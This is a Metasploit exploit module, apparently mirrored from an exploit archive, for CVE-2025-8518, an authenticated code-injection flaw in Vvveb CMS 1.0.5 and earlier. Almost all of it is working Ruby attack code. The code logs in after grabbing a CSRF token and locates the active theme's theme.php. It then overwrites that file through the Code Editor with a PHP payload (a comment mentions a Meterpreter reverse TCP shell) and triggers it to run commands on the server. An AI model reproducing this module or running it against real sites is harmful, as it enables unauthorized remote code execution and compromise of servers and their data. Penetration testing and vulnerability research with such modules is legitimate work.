## https://sploitus.com/exploit?id=PACKETSTORM:210781
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
prepend Msf::Exploit::Remote::AutoCheck
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Remote Code Execution Vulnerability in Vvveb',
'Description' => %q{
Vvveb CMS is vulnerable to code injection via the Code Editor functionality.
Unsanitized editing functionality allows attacker-controlled changes to existing files on the web-accessible filesystem,
allowing remote authenticated attackers with access to the Code Editor to achieve code execution
when those modified files are executed or served by the application or web server.
This vulnerability affects Vvveb CMS versions up to and including 1.0.5.
Successful exploitation may result in the remote code execution under the privileges
of the web server, potentially exposing sensitive data or disrupting survey operations.
An attacker can execute arbitrary system commands in the context of the user running the web server.
},
'License' => MSF_LICENSE,
'Author' => [
'Maksim Rogov', # Metasploit Module
'Hamed Kohi' # Vulnerability Discovery
],
'References' => [
['CVE', '2025-8518'],
['URL', 'https://hkohi.ca/vulnerability/8']
],
'Platform' => ['php'],
'Arch' => [ARCH_PHP],
'Targets' => [
[
'PHP',
{
'Platform' => ['php'],
'Arch' => ARCH_PHP
# Tested with php/meterpreter/reverse_tcp
}
]
],
'DefaultTarget' => 0,
'DisclosureDate' => '2025-01-10',
'Notes' => {
'Stability' => [CRASH_SAFE],
'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK],
'Reliability' => [REPEATABLE_SESSION]
}
)
)
register_options(
[
OptString.new('TARGETURI', [true, 'Path to Vvveb CMS', '/admin/']),
OptString.new('USERNAME', [true, 'The username used to authenticate to Vvveb CMS', 'admin']),
OptString.new('PASSWORD', [true, 'The password used to authenticate to Vvveb CMS', ''])
]
)
end
def get_csrf_token
print_status('Fetching CSRF token...')
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path),
'method' => 'GET',
'keep_cookies' => true
)
fail_with(Failure::Unreachable, "#{peer} - No response from web service") unless res
fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected HTTP code #{res.code}") unless res.code == 200
html = res.get_html_document
csrf_input = html.at('input[name="csrf"]')
fail_with(Failure::UnexpectedReply, "#{peer} - Unable to extract CSRF token") unless csrf_input
token = csrf_input.attributes.fetch('value', nil)
fail_with(Failure::UnexpectedReply, "#{peer} - CSRF token is empty") if token.blank?
print_good("Token successfully fetched: #{token}")
token.to_s
end
def login(raise_on_fail: true)
csrf_token = get_csrf_token
print_status('Attempting login...')
post_data = Rex::MIME::Message.new
post_data.add_part(csrf_token, nil, nil, 'form-data; name="csrf"')
post_data.add_part('', nil, nil, 'form-data; name="redir"')
post_data.add_part(datastore['USERNAME'], nil, nil, 'form-data; name="user"')
post_data.add_part(datastore['PASSWORD'], nil, nil, 'form-data; name="password"')
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path),
'method' => 'POST',
'keep_cookies' => true,
'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
'vars_get' => { 'module' => 'user/login' },
'data' => post_data.to_s
)
if raise_on_fail
fail_with(Failure::Unreachable, "#{peer} - No response from web service") unless res
fail_with(Failure::NoAccess, "#{peer} - Incorrect credentials - #{datastore['USERNAME']}:#{datastore['PASSWORD']}") if res.body.include?('wrong email or password')
fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected HTTP code #{res.code}") unless res.code == 302
else
return CheckCode::Unknown('It was not possible to determine the software version because a network error occurred during the authentication process') unless res
return CheckCode::Unknown("It was not possible to determine the software version because the provided credenaials #{datastore['USERNAME']}:#{datastore['PASSWORD']} are invalid") if res.body.include?('wrong email or password')
return CheckCode::Unknown('It was not possible to determine the software version because an unknown network error code was returned during the authentication process') unless res.code == 302
end
@logged_in = true
print_good('Login successful')
return
end
def get_active_theme_path
print_status('Identifying the active theme path...')
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'index.php'),
'method' => 'GET',
'vars_get' => { 'module' => 'theme/themes' }
)
fail_with(Failure::Unreachable, "#{peer} - No response from web service") unless res
fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected HTTP code #{res.code}") unless res.code == 200
active_theme = res.get_html_document.at('div.list-card.active')
fail_with(Failure::UnexpectedReply, "#{peer} - Card with the active theme was not found") if active_theme.blank?
theme_preview = active_theme.at('.card-img-top img').attributes.fetch('src', nil)
fail_with(Failure::UnexpectedReply, "#{peer} - Preview of the active theme card was not found") if theme_preview.blank?
theme_dir = File.dirname(theme_preview)
theme_path = theme_dir + '/theme.php'
print_good("Theme path successfully identified: #{theme_path}")
theme_path
end
def get_theme_content(theme_path)
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'index.php'),
'method' => 'GET',
'vars_get' => {
'module' => 'editor/code',
'action' => 'loadFile',
'type' => 'themes',
'file' => theme_path
}
)
fail_with(Failure::Unreachable, "#{peer} - No response from web service") unless res
fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected HTTP code #{res.code}") unless res.code == 200
res.body
end
def set_theme_content(theme_path, content)
post_data = Rex::MIME::Message.new
post_data.add_part(content, nil, nil, 'form-data; name="content"')
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'index.php'),
'method' => 'POST',
'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
'vars_get' => {
'module' => 'editor/code',
'action' => 'save',
'type' => 'themes',
'file' => theme_path
},
'data' => post_data.to_s
)
fail_with(Failure::Unreachable, "#{peer} - No response from web service") unless res
fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected HTTP code #{res.code}") if res.code != 200
end
def trigger_payload(_theme_path)
print_status('Triggering payload...')
send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'index.php'),
'method' => 'GET',
'vars_get' => {
'module' => 'editor/editor',
'url' => '/',
'template' => 'index.html'
}
)
end
def set_payload(theme_path)
print_status('Setting up payload...')
set_theme_content(theme_path, payload.encoded)
print_good('Payload setup complete')
end
def check
error_message = login(raise_on_fail: false)
return error_message if error_message
print_status('Checking version...')
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'index.php'),
'method' => 'GET',
'vars_get' => { 'module' => 'tools/systeminfo' }
)
return CheckCode::Detected('Authentication process completed successfully. It means that the server uses Vvveb CMS. However, it was not possible to determine the software version because a network error occurred during the request to the software version page') unless res
return CheckCode::Detected("Authentication process completed successfully. It means that the server uses Vvveb CMS. However, it was not possible to determine the software version because the server returned an unknown status code #{res.code} during the request to the software version page") unless res.code == 200
version_td = res.get_html_document.at('tr:has(th:contains("Vvveb version")) td')
return CheckCode::Detected('Authentication process and the request to the software version page both completed successfully. It means that the server uses Vvveb CMS. However, The Vvveb version tag was not found on the software version page') if version_td.nil?
version = Rex::Version.new(version_td&.text&.strip)
return CheckCode::Appears("Detected version #{version}, which is vulnerable") if version <= Rex::Version.new('1.0.5')
CheckCode::Safe("Detected version #{version}, which is not vulnerable")
end
def cleanup
begin
set_theme_content(@theme_path, @default_theme_content) unless @theme_path.nil? && @default_theme_content.nil?
rescue StandardError
# After receiving the shell, when calling the set_theme_content, the server times out, but there is no need to return an error.
end
super
end
def exploit
login(raise_on_fail: true) unless @logged_in
@theme_path = get_active_theme_path
@default_theme_content = get_theme_content(@theme_path)
set_payload(@theme_path)
trigger_payload(@theme_path)
end
end